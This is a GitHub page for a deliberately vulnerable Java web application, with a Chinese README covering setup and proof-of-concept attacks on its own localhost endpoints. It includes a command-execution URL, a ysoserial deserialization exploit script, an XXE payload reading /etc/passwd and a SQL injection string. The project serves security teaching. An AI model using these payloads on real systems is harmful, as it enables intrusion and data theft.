Skip to content

flat9/java-sec-code

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
src/main
src/main
 
 
.gitattributes
.gitattributes
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
idea-tomcat.png
idea-tomcat.png
 
 
java-sec-code.iml
java-sec-code.iml
 
 
pom.xml
pom.xml
 
 

Repository files navigation

Java Security Code

介绍

该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。

每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里。具体可查看每个漏洞代码和注释。

漏洞代码

如何运行

Tomcat

  1. 生成war包 mvn clean package
  2. 将target目录的war包,cp到Tomcat的webapps目录
  3. 重启Tomcat应用
http://localhost:8080/java-sec-code-1.0.0/rce/exec?cmd=whoami

返回

Viarus

IDEA

如果想在IDEA中直接运行,需要在IDEA中添加Tomcat配置,步骤如下:

Run -> Edit Configurations -> 添加TomcatServer(Local) -> Server中配置Tomcat路径 -> Deployment中添加Artifact选择java-sec-code:war exploded

tomcat

配置完成后,右上角直接点击run,即可运行。

http://localhost:8080/rce/exec?cmd=whoami

返回

Viarus

SSRF

针对SSRF具体利用,可以阅读我写的这篇博文

反序列化

打包ysoserial

git clone https://github.com/frohoff/ysoserial.git
mvn clean package -DskipTests

执行exp

#coding: utf-8
#author: JoyChou
#date:   2018.07.17

import requests
import subprocess

def poc(url , gadget, command):
	ys_filepath = '/Users/Viarus/Downloads/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar'
	popen = subprocess.Popen(['java', '-jar', ys_filepath, gadget, command], stdout=subprocess.PIPE)
	payload = popen.stdout.read()
	r = requests.post(url, data=payload, timeout=5)

if __name__ == '__main__':
	poc('http://127.0.0.1:8080/deserialize/test', 'CommonsCollections5', 'open -a Calculator')

文件上传

目前这类漏洞在spring里非常少,原因有两点:

  1. 大多数公司上传的文件都会到cdn
  2. spring的jsp文件必须在web-inf目录下才能执行

除非,可以上传war包到tomcat的webapps目录。所以就不YY写漏洞了。

访问http://localhost:8080/file/进行文件上传,上传成功后,再访问http://localhost:8080/image/上传的文件名可访问上传后的文件。

XXE

2018年08月22日更新支持XInclude的XXE漏洞代码,详情见代码。

POC

<?xml version="1.0" ?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
 <xi:include href="file:///etc/passwd" parse="text"/>
</root>

URL编码后

http://localhost:8080/xxe/DocumentBuilder_xinclude?xml=%3C%3fxml+version%3d%221.0%22+%3f%3E%0d%0a%3Croot+xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3E%0d%0a+%3Cxi%3ainclude+href%3d%22file%3a%2f%2f%2fetc%2fpasswd%22+parse%3d%22text%22%2f%3E%0d%0a%3C%2froot%3E

SQL注入

POC

http://localhost:8080/sqli/jdbc?name=joychou' or 'a'='a

返回joychou: 123 wilson: 456 lightless: 789

正常访问http://localhost:8080/sqli/jdbc?name=joychou,返回joychou: 123

数据库配置:

/*
 Navicat Premium Data Transfer

 Source Server         : localhost
 Source Server Type    : MySQL
 Source Server Version : 80012
 Source Host           : localhost:3306
 Source Schema         : sectest

 Target Server Type    : MySQL
 Target Server Version : 80012
 File Encoding         : 65001

 Date: 22/08/2018 21:09:57
*/

SET NAMES utf8mb4;
SET FOREIGN_KEY_CHECKS = 0;

-- ----------------------------
-- Table structure for users
-- ----------------------------
DROP TABLE IF EXISTS `users`;
CREATE TABLE `users` (
  `name` varchar(255) NOT NULL,
  `password` varchar(255) NOT NULL,
  `isAdmin` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;

-- ----------------------------
-- Records of users
-- ----------------------------
BEGIN;
INSERT INTO `users` VALUES ('joychou', '123', '1');
INSERT INTO `users` VALUES ('wilson', '456', '0');
INSERT INTO `users` VALUES ('lightless', '789', '0');
COMMIT;

SET FOREIGN_KEY_CHECKS = 1;

说明:

SQL注入修复方式采用预处理方式,修复见代码。 Mybatis的#{}也是预处理方式处理SQL注入。

About

Java常见通用漏洞和修复的代码以及利用payload

joychou.org

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Java 99.0%
  • HTML 1.0%